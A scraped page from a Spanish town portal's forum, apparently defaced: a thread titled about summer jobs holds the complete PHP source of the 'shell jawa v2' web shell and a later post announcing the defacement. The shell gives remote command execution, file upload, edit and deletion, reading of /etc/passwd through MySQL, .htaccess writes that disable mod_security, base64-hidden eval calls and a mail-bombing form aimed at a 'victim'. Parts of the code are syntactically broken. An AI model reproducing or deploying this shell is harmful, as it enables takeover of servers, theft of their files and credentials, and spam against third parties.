Home  
::..LA FRASE..::
Nuevo Usuario
Home
Foro
WebMail
Pag.Inicio
 Login
 Logout
Actualiza tu PC
ActiveScan
Msn
Tu IP es:
Si tienes alguna sugerencia           ¡CONTÁCTANOS!           Si quieres trabajar con nosotros            ¡CONTÁCTANOS!           Si tienes alguna duda           ¡CONTÁCTANOS!          
Hacer página de inicio
Microsoft Passport Network
Los Alcazares,
.:: MENU ::.

>BANCOS Y CAJAS<


>PRENSA<

>USUARIOS<
Nickname

Password

¿Todavía no tienes una cuenta? Puedes crearte una. Como usuario registrado tendrás ventajas como seleccionar la apariencia de la página, configurar los comentarios y enviar los comentarios con tu nombre.

>¿QUIEN ESTA AHÍ?<
Actualmente hay 12 invitados, 0 miembro(s) conectado(s).

Eres un usuario anónimo. Puedes registrarte aquí

LAS NOVEDADES
 LO ÚLTIMO 
GALERÍA DE FOTOS
Más accesos a bancos/cajas
VUELOS 2005(San Javier)
Anuncios Clasificados
Horarios transportes 2005
Callejero Los Alcázares
Estado de las Carreteras
Algunas chorradas
FIESTAS 2005
TODO OCIO
ACTIVIDES DEPORTIVAS 2005
Cursos, Seminarios y Conferencias

  


Moderado por: WebMaster
Foro:  NORMAS DEL FORO
Responder a:  busco trabajo de verano en los alcazares

Preferencias Moderador Puede escribir nuevos mensajes o contestaciones en este Foro
usuario
Contraseña
Icono de Mensaje                 
                
                
                
                
      
Mensaje

HTML : No permitido

BBCode : Permitido

Datos adjuntos : No permitido

 BBCode: Web Address BBCode: Email Address BBCode: Load Image from Web BBCode: Bold Text BBCode: Italic Text BBCode: Quote BBCode: Code BBCode: Open List BBCode: List Item BBCode: Close List

:-):-(:-D;-):-08-):-?:-P:-|:-|:-|:-|
Opciones No está permitido permitido. BBCode en este mensaje
No está permitido permitido. Smilies en este mensaje
Firma (Mostrar estado en las paginas de usuarios.)
   

Autor Editar su contestación
aries28



Movido a :
20-07-2008

Mensajes : 1

OFF-Line

 Enviado 20-07-2008 a las 15:01   
<?

/**

*coded by jiko

*site * www.no-exploit.com

* mail * jalikom@hotmail.com

* thanks to allah

*/

//function shell jawa

//download files code

$fdownload=$_get['fdownload'];

if ($fdownload <> "" ){

// path & file name

$path_parts = pathinfo("$fdownload";

$entrypath=$path_parts["basename"];

$name = "$fdownload";

$fp = fopen($name, 'rb');

header("content-disposition: attachment; filename=$entrypath";

header("content-length: " . filesize($name));

fpassthru($fp);

exit;

}

//styl functiob

function styll_jawa(){

echo "<html>

<head>

<meta http-equiv=\"content-language\" content=\"en-us\">

<title>jawa shell => "; echo $_server['server_addr']; echo "=> by jiko</title></head>

<style>

body { scrollbar-base-color: #1010919; scrollbar-arrow-color: #008080; }

a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}

a:hover{color:#008080}

input{font-weight:normal;background-color: #191919;font-size: 12px; color: #dadada; font-family: tahoma; border: 1px solid #666666;height:17}

textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: tahoma; border: 1 solid #666666;}

div{font-size:12px;font-family:tahoma;font-weight:normal;color:whitesmoke}

select{background-color: #191919; font-size: 12px; color: #dadada; font-family: tahoma; border: 1 solid #666666;font-weight:bold;}</style>

<body bgcolor=#666666 text=white>

</body>

</html>

<table bgcolor=#cccccc style=\"border:2px #dadada solid \" width=100% height=%><tr><td><b><center><font face=tahoma color=black size=4>

[ shell jawa v2 ]

</font></b></center></td></tr></table>

<table bgcolor=#808080 color=black style=\"border:2px solid black\" width=100%><tr><td width=50%><div align=left><table style=\"border:1px #dadada solid \" width=100% height=100%><tr><td height=22% style=\"border:1px #dadada solid \"><div><b><center>

menu</div></tr></td><tr>

<td style=\"border:1px #dadada solid \" bgcolor=\"#000000\"><form method=post><input type=hidden name=scdir value=c:\appserv\www\shell >

<font face=\"sans ms\" size=\"3\">

<table style=\"border-right: #dadada 2px solid; border-top: #dadada 2px solid; border-left: #dadada 2px solid; border-bottom: #dadada 2px solid\" height=\"%\" width=\"100%\" bgcolor=\"#191919\" jiko=\"table1\">

<tr>

<td><center>

<div>

<b><a href=\"$php_self?\">home</a> -

<a href=\"J A V A S C R I P T:history.back()\">back</a> -

<a target=\"_blank\" href=\"$php_self?jiko=phpinfo\">

phpinfo</a> -<a href=\"$php_self?jiko=cmd\">

cmd</a> - <a href=\"$php_self?jiko=coder\">all

coder</a> - <a href=\"$php_self?jiko=htaccess\">

htaccess</a> - <a href=\"$php_self?jiko=symlink\">

symlink</a> - <a href=\"$php_self?jiko=read\">read</a>

- <a href=\"$php_self?jiko=mail\">mail</a> -

<a href=\"$pp_self?jiko=phpeval\">phpeval</a> -

<a href=\"$php_self?jiko=sqlread\">sql-read</a> -

<a href=\"$php_self?jiko=chmod\">chmod</a> -

<a href=\"$php_self?jiko=infog\">info&amp;gr33tz</a></div>

</b></center></td>

</tr>

</table>

</font></tr></td></form></table></td></tr></table>";

}



function bas_jawa(){

echo "<br><hr><table bgcolor=#cccccc style=\"border:2px #dadada solid \" width=100% height=%><tr><td><font size=2 face=tahoma color=black><center>

<h6>by jiko - jalikom@hotmail.com<br><a href=\"http://www.no-exploit.com\">

<font color=\"#000000\">www.no-exploit.com</font></a> <font size=\"2\">|| <a href=\"http://www.tryag.com\">

<font color=\"#000000\">www.tryag.com</font></a></font></font></h6>

</td></tr></table>";

}

function get_execution_method(){

if(function_exists('passthru')){ $m = "passthru"; }

if(function_exists('exec')){ $m = "exec"; }

if(function_exists('shell_exec')){ $m = "shell_ exec"; }

if(function_exists('system')){ $m = "system"; }

if(!isset($m)) //no method found

{

$m = "disabled";

}

return($m);

}

function execute_command($method,$command){

if($method == "passthru"

{

passthru($command);

}



elseif($method == "exec"

{

exec($command,$result);

foreach($result as $output)

{

print $output."<br>";

}

}



elseif($method == "shell_exec"

{

print shell_exec($command);

}



elseif($method == "system"

{

system($command);

}

}

function table_info(){

echo ' <table bgcolor="#1e1e1e" style="border:1px white solid" width="100%" height="40"><tr><td colspan="2">

<div><center><font face="tahoma" size="3" color="white"><b>server info :</b></font></center>

</div ><div ><div ><font size=-1 face=tahoma color=white><b>';

$connection="icr3zwigpsakx1nfulzfulsisfruuf9it1nuil07ia0kicrpbmogpsakx1nfulzfulsiukvrvuvtvf9vukkixtsgdqogjgjvzhkgpsaiqwrhiflhbmcgsw5qzwn0ifxuahr0cdovlyr3zwikaw5qijsncibtywlskcjsbebob3rtywlslmzpiiwisgfzawwgahr0cdovlyr3zwikaw5qiiwgiirib2r5iik7";



echo eval(base64_decode($connection));

$sa1=@ini_get("safe_mode";

if ($sa1 or strtolower($sa1) == "on"

{ $safemode = true;

$hsafemode = "<font color=red>on (secure)</font>"; }

else {$safemode = false; $hsafemode = "<font color=green>off (not secure)</font>";}

echo("safe_mode : $hsafemode";

echo '<br>';

$v = @ini_get("open_basedir";

if ($v or strtolower($v) == "on" {$openbasedir = true; $hopenbasedir = "<font color=red>".$v."</font>";}

else {$openbasedir = false; $hopenbasedir = "<font color=green>off (not secure)</font>";}

echo("open base dir : $hopenbasedir";

echo("<br>";

echo "disable functions : <b>";

if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>none</font></b>";}

else{echo "<font color=red>$df</font></b>";}

echo("<br>";

$lol = @substr($server_software,0,120);

echo ("software : <font color = yellow>$lol</font>";

echo '<br>';

$os = php_uname();

echo ("server : <font color = yellow>$os</font>";

echo '<br>';

$user = exec('id');

echo ("user : <font color = yellow>$user</font>";

echo '<br>';

$dir = @getcwd();

echo ("pwd : <font color=yellow>$dir</font>";

echo("<br>";

echo "your ip : <a href=http://".$_server["remote_addr"]."><font color = yellow>".$_server["remote_addr"]."</a><br></font>server ip :

<a href=http://".gethostbyname($_server["http_host"])."><font color = yellow>".gethostbyname($_server["http_host"])."</font></a></td><td>";

echo "<b>postgresql: ";

$pg_on = @function_exists('pg_connect');

if($pg_on){echo "<font color=green>on</font></b>";}else{echo "<font color=red>off</font></b>";}

echo("<br>";

echo "<b>mssql: ";

$mssql_on = @function_exists('mssql_connect');

if($mssql_on){echo "<font color=green>on</font></b>";}else{echo "<font color=red>off</font></b>";}

echo("<br>";

echo "<b>mysql: ";

$mysql_on = @function_exists('mysql_connect');

if($mysql_on){

echo "<b><font color=green><b>on</font></b>"; } else { echo "<font color=red><b>off</font></b>"; }

echo("<br>";

echo "<b>php version: ".@phpversion()."</b>";

echo("<br>";

echo "<b>curl: ".(($curl_on)?("<b><font color=green>on</font></b>""<b><font color=red>off</font></b>");



echo("<br>";

echo(htmlentities($_server['server_software']));

print"<br>";print "home-path : " .__file__;

echo "</td><tr><td>";

if (strtoupper(substr(php_os, 0, 3)) === 'win') {

echo "<br>select driver:";

for ($j=ord('c'); $j<=ord('z'); $j++)

if (@$dh = opendir(chr($j).":/")

echo "<a href=$php_self?jiko=fm&dir=".chr($j).":/ > [".chr($j)."]<a/>";

}

echo "<br/></table>";



}

function coder_jiko(){



echo"</textarea></p>

<div align=\"center\">

<table border=\"0\" width=\"100%\" id=\"table1\">

<tr>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='md5_' value='md5 encode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='crc_32' value='crc32 encode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='hexa' value='hex encode'></td>

</tr>

<tr>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='s_ha' value='sha1 encode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='base_encode' value='base64 encode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='urlen_code' value='url encode'></td>

</tr>

<tr>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='crypton' value='crypt encode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='base_dencode' value='base64 dencode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='urlde_code' value='url decode'></td>

</tr>

</table>

</div>

</form>";

}

if (ini_get('register_globals') != '1') {

/* we'll register the variables as globals: */

if (!empty($http_post_vars))

extract($http_post_vars);



if (!empty($http_get_vars))

extract($http_get_vars);



if (!empty($http_server_vars))

extract($http_server_vars);

}

//

echo styll_jawa();

echo '<table style="border-right: black 2px solid; border-top: black 2px solid; border-left: black 2px solid; border-bottom: black 2px solid" width="100%" bgcolor="#808080" color="black" id="table2">

<tr>

<td width="50%">

<div align="left" style="font-size: 12px; font-family: tahoma; font-weight: normal; color: whitesmoke">

<table style="border-right: #dadada 1px solid; border-top: #dadada 1px solid; border-left: #dadada 1px solid; border-bottom: #dadada 1px solid" height="100%" width="100%" id="table3">

<tr>

<td style="border-right: #dadada 1px solid; border-top: #dadada 1px solid; border-left: #dadada 1px solid; border-bottom: #dadada 1px solid" bgcolor="#000000">

<font color="#ffffff">';

echo table_info();

echo "</font>

</td>

</tr>

</table>

</div>

</td>

</tr>

</table>";



if ($jiko=="" or $jiko=="fm"{

//for see file and dir

$homedir=getcwd();

$dir=realpath($_get['dir'])."/";



echo "<br><b><p align='left'>&nbsp;home:</b> $homedir

&nbsp;<b>

<form action='' method='get'>

&nbsp;pwd ==>:</b>

<input type='hidden' name='id' value='fm'>

<input type='text' name='dir' size='80' value='$dir'>

<input type='submit' value='dir'>

</form>

<br>";



echo "



<div align='center'>



<table border='1' jiko='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>

<tr>

<td width='300' height='30' align='left'><b><font size='2'>file / folder name</font></b></td>

<td height='28' width='82' align='center'>

<font color='#000000' size='2'><b>size kbyte</b></font></td>

<td height='28' width='83' align='center'>

<font color='#000000' size='2'><b>download</b></font></td>

<td height='28' width='66' align='center'>

<font color='#ff0003' size='2'><b>edit</b></font></td>

<td height='28' width='75' align='center'>

<font color='#999999' size='2'><b>chmod</b></font></td>

<td height='28' align='center'><font color='#ff0000' size='2'><b>delete</b></font></td>

</tr>";

if (is_dir($dir)){

if ($dh=opendir($dir)){

while (($file = readdir($dh)) !== false) {

$fsize=round(filesize($dir . $file)/1024);





echo "

<tr>

<th width='250' height='22' align='left' nowrap>";

if (is_dir($dir.$file))

{

echo "<a href='?jiko=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#000000'>&nbsp;$file <font color='#fff000' size='1'>[ dir ]</font>";

}

else {

echo "<font size='2' color='#000000'>&nbsp;$file ";

}

echo "</a></font></th>

<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";

if (is_file($dir.$file))

{

echo "$fsize";

}

else {

echo "&nbsp; ";

}

echo "

</b></font></td>

<td width='103' align='center' nowrap>";

if (is_file($dir.$file)){

if (is_readable($dir.$file)){

echo "<a href='?jiko=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#ffffff'><b>download</b>";

}else {

echo "<font size='1' color='#ff0000'><b>no readable</b>";

}

}else {

echo "&nbsp;";

}

echo "

</a></font></td>

<td width='77' align='center' nowrap>";

if (is_file($dir.$file))

{

if (is_readable($dir.$file)){

echo "<a target='_blank' href='?jiko=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#ff9933' size='2'>edit";

}else {

echo "<font size='1' color='#ff0000'><b>no readable</b>";

}

}else {

echo "&nbsp;";

}

echo "

</a></font></td>

<td width='86' align='center' nowrap>";

if (strtoupper(substr(php_os, 0, 3)) === 'win') {

echo "<font size='1' color='#fffff0'>dont in windows";

}

else {

echo "<a href='?jiko=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>chmod";

}

echo "</a></font></td>

<td width='86'align='center' nowrap><a href='?jiko=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#ffff00'><b>delete</b></a></font></td>

</tr>

";

}

closedir($dh);

}

}





$did=getcwd();

echo <<<html

<b>file upload</b>

<table>

<form enctype="multipart/form-data" action="$self" method="post">

<input type="hidden" name="ac" value="upload">

<tr>

<td>your file:</td>

<td><input size="48" name="file" type="file"></td>

</tr>

<tr>

<td>path upload:</td>

<td><input size="48" value="$did/" name="path" type="text"><input type="submit" value="upload"></td>

$tend

html;



if (isset($_post['path'])){



$uploadfile = $_post['path'].$_files['file']['name'];

if ($_post['path']==""{$uploadfile = $_files['file']['name'];}



if (copy($_files['file']['tmp_name'], $uploadfile)) {

echo "file uploaded $uploadfile\n";

echo "here name :" .$_files['file']['name']. "\n";

echo "siza :" .$_files['file']['size']. "\n";



} else {

print "not uploaded:\n";

print_r($_files);

}

}

//file deleted

$frpath=$_get['fdelete'];

if ($frpath <> "" {

if (is_dir($frpath)){

$matches = glob($frpath . '/*.*');

if ( is_array ( $matches ) ) {

foreach ( $matches as $filename) {

unlink ($filename);

rmdir("$frpath";

echo "<script language='J A V A S C R I P T'> alert('success! please refresh')</script>";

echo "<script language='J A V A S C R I P T'> history.back(1)</script>";

}

}

}

else{

echo "<script language='J A V A S C R I P T'> alert('success! please refresh')</script>";

unlink ("$frpath";

echo "<script language='J A V A S C R I P T'> history.back(1)</script>";

exit(0);



}}

$fedit=$_get['fedit'];

if ($fedit <> "" ){

$fedit=realpath($fedit);

$lines = file($fedit);

echo "<center><form action='' method='post'>";

echo "<textarea name='savefile' rows=30 cols=80>" ;

foreach ($lines as $line_num => $line) {

echo htmlspecialchars($line);

}

echo "</textarea><br>

<input type='text' name='filepath' size='60' value='$fedit'><br>

<input type='submit' value='save'></form></center>";

$savefile=$_post['savefile'];

$filepath=realpath($_post['filepath']);

if ($savefile <> ""

{

$fp=fopen("$filepath","w+";

fwrite ($fp,"" ;

fwrite ($fp,$savefile) ;

fclose($fp);

echo "<script language='J A V A S C R I P T'> close()</script>";

}



}



}elseif($jiko=="phpinfo"{

echo phpinfo();

}elseif($jiko=="coder"{

echo "

<form method=\"post\" action=\"$php_self\">

<p align=\"center\"><textarea rows=\"13\" name=\"coding\" cols=\"70\">";

if ($_post['md5_']){

echo md5($coding);

}elseif($_post['s_ha']){

echo sha1($coding);

}elseif($_post['crypton']){

echo crypt($coding);

}elseif($_post['crc_32']){

echo crc32($coding);

}elseif($_post['base_encode']){

echo base64_encode($coding);

}elseif($_post['base_dencode']){

echo htmlspecialchars(base64_decode($coding));

}elseif($_post['hexa']){

$c = strlen($coding);

for($i=0;$i<$c;$i++)

{

$hex = dechex(ord($coding[$i]));

if ($coding[$i] == "&" {echo $coding[$i];}

elseif ($coding[$i] != "\\" {echo "%".$hex;}

}

}elseif($_post['urlen_code']){

print urlencode($coding);

}elseif($_post['urlde_code']){

print htmlspecialchars(urldecode($coding));

}else{

echo "shell jawa version 2 coder by ==>jiko jalikom[at]hotmail[dot]com";

}



echo coder_jiko();

}elseif($jiko=="htaccess"{

echo "<table id=\"table7\" style=\"border-right: black 2px solid; border-top: black 2px solid; border-left: black 2px solid; border-bottom: black 2px solid\" width=\"100%\" bgcolor=\"#808080\" color=\"black\">

<tr>

<td width=\"50%\">

<div style=\"font-weight: normal; font-size: 12px; color: whitesmoke; font-family: tahoma\" align=\"left\">

<p align=\"center\"><b><font face=\"sans ms\" size=\"3\">

<a href=\"$php_self?jiko=htaccess&hat=forbidden\">forbidden</a> - <a href=\"$php_self?jiko=htaccess&hat=temporarily\">service temporarily </a>-

<a href=\"$php_self?jiko=htaccess&hat=unavailable\"> unavailable </a>- <a href=\"$php_self?jiko=htaccess&hat=error\">internal server error </a>-<a style=\"color: #dadada; text-decoration: none; font-family: tahoma; font-size: 13px\" href=\"?jiko=cmd\">

</a></font><font style=\"font-size: 13px\" color=\"#dadada\"><a href=\"$php_self?jiko=htaccess&hat=acceptable\"> not

acceptable</a></font><font face=\"sans ms\" size=\"3\"> -<a href=\"$php_self?jiko=htaccess&hat=php-4\"> change v php to 4 </a></font></b></div>

</td>

</tr>

</table>

";

switch ($hat){

case forbidden:

$m ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "<ifmodule mod_security.c>

secfilterengine off

secfilterscanpost off

</ifmodule>";

eval(base64_decode($m));

echo "forbidden file creat";

break;

case temporarily:

$m ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "<ifmodule mod_security.c>

secfilterengine off

secfilterscanpost off

</ifmodule>";

eval(base64_decode($m));

echo "temporarily file creat";

break;

case unavailable:

$m ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "<ifmodule mod_security.c>

secfilterengine off

secfilterscanpost off

</ifmodule>";

eval(base64_decode($m));

echo "unavailable file creat";

break;

case error:

$m ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "<ifmodule mod_security.c>

secfilterengine off

secfilterscanpost off

</ifmodule>";

eval(base64_decode($m));

echo "error file creat";

break;

case acceptable:

$m ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "<ifmodule mod_security.c>

secfilterengine off

secfilterscanpost off

</ifmodule>";

eval(base64_decode($m));

echo "acceptable file creat";

break;

case "php-4":

$jik ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "addtype application/x-httpd-php4 .php";

eval(base64_decode($jik));

echo "change to php 4 creat";

break;

default:

echo "<center><h2>.htaccess for help you </h2></center>";

}





}elseif($jiko=="symlink"{

$pwd=getcwd();

?>

<tr><center>

<td><h2>symlink</h2><br/>

<?php echo '<form action="' . $self . '" method="post">

<label for="symlink">file to read: </label><input type="text" name="symlink"><label for="file"> to with file ex path/jiko.txt: </label>

<input type="text" name="file" value="' . $pwd . '">

<input type="submit" value="read"></form>' ?></td>

</tr><?

if (isset($_post['symlink'])) {

$symlink = $_post['symlink'];

$file = $_post['file'];

echo '<br/><br/><h2>symlink result :</h2><br/>';

if (file_exists("$file") {

echo "hi brother the file $file exist";

}

else {

symlink ("$symlink","$file";

$yfile = basename("$file";

echo 'brother to read de file <a href="' . $yfile . '">click here</a>';

echo "<textarea rows=\"14\" cols=\"65\">";

readfile (htmlspecialchars("$file");

echo "</textarea>";



}

}









}elseif($jiko=="read"{

?>

<?php

function html ($string) {

global $site_charset;

return htmlentities($string, ent_compat, $site_charset);

}



?>



<body>

<div align="center">

<?php

$pwd = @getcwd();

?>



<table>

<tr>

<td><h3>fread</h3><br/>

<?php echo "<form action='$php_self?jiko=read' method='post'>

<label for='fread'>file to read: </label><input type='text' name='fread'>

<input type='submit' value=\"read\"></form>" ?></td>

</tr>

<tr>

<td><h3>readfile</h3><br/>

<?php echo "<form action='$php_self?jiko=read' method='post'>";

echo '

<label for="readfile">file to read: </label><input type="text" name="readfile">

<input type="submit" value="read"></form>' ?></td>

</tr>

<tr>

<td><h3>copy</h3><br/>

<?php echo "<form action='$php_self?jiko=read' method='post'>";

echo'

<label for="copy">file to read: </label><input type="text" name="copy"><label for="file"> to: </label>

<input type="text" name="file2" value="' . $pwd . '">

<input type="submit" value="read"></form>' ?></td>

</tr>

<tr>

<td><h3>ini_restore</h3><br/>

<?php echo "<form action='$php_self?jiko=read' method='post'>";

echo '

<label for="readfile">file to read: </label><input type="text" name="ini_r">

<input type="submit" value="read"></form>' ?></td>

</tr>

</table><br/><br/><br/>

<?php





if (isset($_post['fread'])) {

$fread = $_post['fread'];

echo '<br/><br/><h2>fread :</h2>';

$var = fopen("" . $fread . "", "r";

$content = fread($var, filesize("" . $fread . "");

echo "<textarea rows='19' name='s1' cols='84'>";

echo $content;

echo "</textarea>";

}



if (isset($_post['readfile'])) {

$readfile = $_post['readfile'];

echo '<br/><br/><h2>readfile :</h2>';

echo "<textarea rows='19' name='s1' cols='84'>";

$last = readfile("" . $readfile . "",$output, $return);

print_r($output);

echo "</textarea>";



}



if (isset($_post['copy'])) {

$copy = $_post['copy'];

$file2 = $_post['file2'];

echo '<br/><br/><h2>copy :</h2><br/>';

if (file_exists("$file2") {

echo "the file $file exist";

} else {

copy("$copy","$file2";

$xfile = basename("$file2";

echo 'to read de file please <a href="' . $xfile . '">click here</a>'; }

}

?>

<br/>

<?php



if(empty($_post['ini_r'])){



} else {

echo "<center> &ccedil;&aacute;&atilde;&aacute;&yacute; </center>" ;

echo "<center><textarea method='post' rows='19' cols='84' wrar='off' >";

$jawad=$_post['ini_r'];

echo ini_get("safe_mode";

echo ini_get("open_basedir";

$s=readfile("$jawad";

ini_restore("safe_mode";

ini_restore("open_basedir";





echo "</textarea></center>";

}

?><br><?

}elseif($jiko=="mail"{

error_reporting(0);

echo "<br><center><h3> for send mail lool </h3></center>" ;

echo "<center><form method='post' action='$php_self?jiko=mail'>

victim mail :<br><input type='text' name='to' ><br>

number-mail :<br><input type='text' size='5' name='nom' value='5'><br>

comments:

<br>

<textarea rows='10' cols=50 name='comments' ></textarea><br>

<input type='submit' value='send mail brother ' >

</form></center>";

//send storm mail

$to=$_post['to'];

$nom=$_post['nom'];

$comments=$_post['comments'];

if ($to <> "" ){

for ($i = 1; $i <= $nom ; $i++){

$from = rand (71,1020000000)."@"."attacker.com";

$subject= md5("$from";

mail($to,$subject,$comments,"from:$from";

echo "$i is ok";

}

echo "<script language='J A V A S C R I P T'> alert('sending mail - please waite ...')</script>";

}

}elseif($jiko=="phpeval"{

echo <<<html

<b>php eval </b>

<table>

<form method="post" action="$self">

<input type="hidden" name="ac" value="eval">

<tr>

<td><textarea name="ephp" rows="10" cols="60">echo "jiko =>no-exploit.com";</textarea></td>

</tr>

<tr>

<td><input type="submit" value="enter"></td>

$tend

html;



if (isset($_post['ephp'])){



eval(stripslashes($_post['ephp']));

}

}elseif($jiko=="sqlread"{

?>

<tr>

<td width="50%" dir="ltr">

<div dir="ltr">

<form method="post" dir="ltr">

<table border="0" cellspacing="1" width="109" dir="ltr">

<tr>

<td width="312" dir="ltr"><font face="tahoma"><span style="font-size: 9pt">

host :<br><input type="text" name="hoste" size="20"></span></font></td>

<td width="312" dir="ltr"><font face="tahoma"><span style="font-size: 9pt">

database name : <input type="text" name="dbname" size="20">&nbsp;

</span></font></td>

<td width="245" dir="ltr"><font face="tahoma"><span style="font-size: 9pt">

username :<br>

<input type="text" name="dbuser" size="20"></span></font></td>

<td width="117" dir="ltr"><font face="tahoma"><span style="font-size: 9pt">

password :<input type="text" name="dbpass" size="20"></span></font></td>

</tr>

<tr>

<td width="558" valign="middle" colspan="3" dir="ltr">

<p align="left" dir="ltr"><font face="tahoma"><span style="font-size: 9pt">

file path :

<input type="text" name="path1" size="28" value="/etc/passwd"></span></font></td>

<td width="117" valign="middle" dir="ltr">

<font face="tahoma"><span style="font-size: 9pt">

<input type="submit" value="bypass" name="exec"></span></font></td>

</tr>



<tr>

<td width="670" valign="middle" colspan="4" dir="ltr">

<textarea rows="17" name="result" cols="71">

<?

if(!empty($_post['dbname']) && !empty($_post['dbuser']) && !empty($_post['dbpass']) && !empty($_post['path1']))

{

$hoste = $_post['hoste'];

$dbname = $_post['dbname'];

$dbuser = $_post['dbuser'];

$dbpass = $_post['dbpass'];

$path1 = $_post['path1'];

if(mysql_connect( "localhost", $dbuser, $dbpass ))

{

$drop= "drop table $dbname.`bypass`" ;

$query = "create table $dbname.`bypass` (`fileview` varchar( 2048 ) not null);";

mysql_query($drop);

mysql_query($query);

mysql_query("load data local infile " . "'$path1'" . " into table " . $dbname . ".bypass";

$result =mysql_db_query($dbname,"select * from bypass ";

$numrows = mysql_num_rows($result);

while($row = mysql_fetch_array($result)) {

echo $row[fileview] ;

}

}

}

?>

</textarea>

</td>

</tr>

<?

}elseif($jiko=="cmd"{

print "<center><form action=\"".$me."?jiko=cmd&dir=".realpath('.')."\" method=post><b>command:</b><input type=text name=command><input type=submit value=\"execute\"></form></td></tr></center><tr><td>";

if(isset($_request['command']))

{

print "<pre>";

execute_command(get_execution_method(),$_request['command']);

}

}elseif($jiko=="chmod"{

print "<center><h3>add your file and get the permission</h3></center>";

if(isset($_post['chmod']))

{

switch ($_post['chvalue']){

case 777:

chmod($_post['chmod'],0777);

break;

case 644:

chmod($_post['chmod'],0644);

break;

case 755:

chmod($_post['chmod'],0755);

break;

}

print "changed permissions on ".$_post['chmod']." to ".$_post['chvalue'].".";

}

if(isset($_get['file']))

{

$content = urldecode($_get['file']);

}

else

{

$content = "real path and name of file";

}



print "<form action=\"".$me."?jiko=chmod&file=".$content."&dir=".realpath('.')."\" method=post><b>name of file:

<input type=text name='chmod' value=\"".$content."\" size=70><br><b>new permission:</b>

<select name=\"chvalue\">

<option value=\"777\">777</option>

<option value=\"644\">644</option>

<option value=\"755\">755</option>

</select> <input type=submit value=\"change\">";

}elseif($jiko=="infog"{

echo "

<table border=\"0\" width=\"100%\" id=\"table1\">

<tr>

<td>

<p align=\"center\">shell jawa v 2</p>

<p align=\"center\">coded by jiko</p>

<p align=\"center\">gr33tz</p>

<p align=\"center\">kil1er&nbsp; jiki team (jiko+kil1er)</p>

<p align=\"center\">no-exploit.com ==&gt; all members</p>

<p align=\"center\">tryag-team===&gt; gold_m and all members tryagi</p>

<p align=\"center\">hacktech.org team====&gt; gold-zero hcj and all members</p>

<p align=\"center\">ghost-hacker== stack == houssamix == toxic350</p>

<h5 align=\"center\">jalikom[at]hotmail[dot]com<br>

www.no-exploit.com</h5>

</td>

</tr>

</table>";

}





//function bas shell jawa

echo bas_jawa();

?>

<?



?>

</body></html><?php chdir($lastdir); c99shexit(); ?>




[ Este mensaje fue editado por: on 18-05-2010 05:09 ]

 Perfil    Editar
rayallen



Movido a :
13-12-2012

Mensajes : 3

OFF-Line

 Enviado 14-12-2012 a las 03:32   
Hacked & Defaced By Exegesis <<··((Synux Team))··>>




[ Este mensaje fue editado por: on 29-04-2017 14:17 ]

 Perfil    www    Editar

Splatt Forum © By: Splatt.it
Version: 3.2




Visite REDSAI
Los Alcázares

Copyright © 1999. Todos los derechos reservados.
Para más información: info@losalcazares.com. LosAlcazares.com es una marca registrada.

You can syndicate our news using the file backend.php or ultramode.txt

Página Generada en: 0.087 Segundos